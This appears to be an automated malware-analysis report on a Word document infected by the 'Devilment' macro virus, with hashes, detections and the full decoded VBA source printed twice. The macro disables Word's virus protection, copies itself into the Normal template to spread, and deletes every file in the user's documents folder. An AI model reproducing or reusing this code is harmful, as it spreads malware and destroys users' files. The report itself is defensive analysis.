Devilment Office (OLE) malware analysis — malicious · e6cc0940c0ce0bc2

MALICIOUS

Office (OLE)

36.0 KB Created: 1980-01-11 06:07:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: f742dc67f6251dbaa0d1fbf65d14cdc6 SHA-1: 6658d754514306c60149ae203e7dc0c77844211a SHA-256: e6cc0940c0ce0bc20030f87e8847c0355923c203f7d815411e1fa8bfba3ade3d

80 Risk Score

Malware Insights

Devilment · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Devilment-1'. It contains VBA macros within a module named 'Devilment'. The script attempts to disable virus protection and manipulate the Normal.dot template to ensure persistence and spread. It also attempts to delete files from the user's documents directory.

Heuristics 2

ClamAV: Doc.Trojan.Devilment-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Devilment-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1732 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1732 bytes
SHA-256: `e1c2dc19f145387fd2b4701269afdeeb26c1ea4c4ccb972c45575eef2774d68a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Devilment" Sub FileClose() Attribute FileClose.VB_Description = "Closes all of the windows of the active document" Attribute FileClose.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.FileClose" 'Devilment 'An experiment in Macro programming ;) 'Ha Ha Ha On Error Resume Next Application.Options.VirusProtection = False Application.Options.SaveNormalPrompt = False Application.Options.ConfirmConversions = False Dim x As Integer Dim found As Boolean found = False x = 1 For x = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents.Item(x).CodeModule.Lines(2, 1) = "'Devilment" Then found = False Next x If Not found Then Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "devilment", wdOrganizerObjectProjectItems End If If NormalTemplate.Saved = False Then NormalTemplate.Save found = False x = 1 For x = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents.Item(x).CodeModule.Lines(2, 1) = "'Devilment" Then found = False Next x If Not found Then NormalTemplate.VBProject.VBComponents("devilment").Export ("c:\devilment.tmp") ActiveDocument.VBProject.VBComponents.Import ("c:\devilment.tmp") ActiveDocument.SaveAs ActiveDocument.FullName Kill ("c:\devilment.tmp") Kill ("c:\mydocu~1\.") End If ' WordBasic.FileClose End Sub

SHA-256: e1c2dc19f145387fd2b4701269afdeeb26c1ea4c4ccb972c45575eef2774d68a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Devilment"
Sub FileClose()
Attribute FileClose.VB_Description = "Closes all of the windows of the active document"
Attribute FileClose.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.FileClose"
'Devilment
'An experiment in Macro programming ;)
'Ha Ha Ha
 On Error Resume Next
  Application.Options.VirusProtection = False
  Application.Options.SaveNormalPrompt = False
  Application.Options.ConfirmConversions = False
  Dim x As Integer
  Dim found As Boolean
  found = False
  x = 1
  For x = 1 To NormalTemplate.VBProject.VBComponents.Count
    If NormalTemplate.VBProject.VBComponents.Item(x).CodeModule.Lines(2, 1) = "'Devilment" Then found = False
  Next x
  If Not found Then
    Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "devilment", wdOrganizerObjectProjectItems
  End If
  If NormalTemplate.Saved = False Then NormalTemplate.Save
  
  found = False
  x = 1
  For x = 1 To ActiveDocument.VBProject.VBComponents.Count
    If ActiveDocument.VBProject.VBComponents.Item(x).CodeModule.Lines(2, 1) = "'Devilment" Then found = False
  Next x
  If Not found Then
    NormalTemplate.VBProject.VBComponents("devilment").Export ("c:\devilment.tmp")
    ActiveDocument.VBProject.VBComponents.Import ("c:\devilment.tmp")
    ActiveDocument.SaveAs ActiveDocument.FullName
    Kill ("c:\devilment.tmp")
    Kill ("c:\mydocu~1\*.*")
  End If '
    WordBasic.FileClose

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.